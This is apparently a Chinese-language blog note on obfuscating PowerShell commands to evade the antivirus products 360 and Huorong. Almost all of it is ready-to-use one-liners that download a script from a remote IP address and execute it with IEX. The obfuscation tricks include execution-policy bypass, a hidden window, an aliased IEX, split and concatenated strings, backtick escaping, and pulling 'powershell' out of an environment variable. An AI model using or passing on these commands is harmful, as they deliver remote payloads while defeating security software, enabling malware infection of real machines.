powershell混淆免杀--过360,火绒
最终结果
windows10
echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10’+'1.34.38.1'+'89/a') | %psmodulepath:~24,10% -
其他
echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10’+'1.34.38.1'+'89/a') | powershell -
1.文件落地
本地读取然后通过管道符运行
powershell Get-Content1.ps1 | powershell -NoProfile -
Bypass执行策略绕过
powershell -ExecutionPolicy bypass -File ./1.ps1
Unrestricted执行策略标志
powershell -ExecutionPolicy unrestricted -File ./1.ps1
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://101.34.38.189:80/a'))"
2.文件不落地
1.为iex设置别名
iex => Invoke-expression
set-alias -name hhh -value IEX
powershell set-alias -name hhh -value IEX;hhh(New-Object Net.WebClient).DownloadString('http://192.168.1.1/123.txt')
powershell set-alias -name cseroad -value Invoke-Expression;cseroad(New-Object Net.WebClient).DownloadString('http://192.168.10.26:88/a/payload.ps1')
2.采用echo方式,远程下载并通过IEX运行脚本
echo Invoke-Expression(new-object net.webclient).downloadstring('http://192.168.10.26:88/a/payload.ps1') | powershell -
3.win10环境变量截取出powershell
%psmodulepath:~24,10%
4.变量拼接
$b1='invoke-Ex';$b2='pression';$a1='((new-object net.webclient).downl';$a2='oadstring(''http://192.168.0.104:80/a''))';$a3=$b1,$b2,$a1,$a2;iex(-join $a3)
5.利用'+'拼接和变量拼接
powershell "$b='((new-object net.webclient).downlo)';$a='(adstring(http://192.168.1.1/payload.ps1))';IEX ($b+$a)"
6.使用反引号处理字符,PowerShell团队使用反引号作为转义字符
`' 单引号 `" 双引号`0 空值 `a 警报`b 退格 `f 换页`n 新行 `r 回车`t 水平制表 `v 垂直制表
echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10’+'1.34.38.1'+'89/a') | %psmodulepath:~24,10% -
echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10’+'1.34.38.1'+'89/a') | powershell -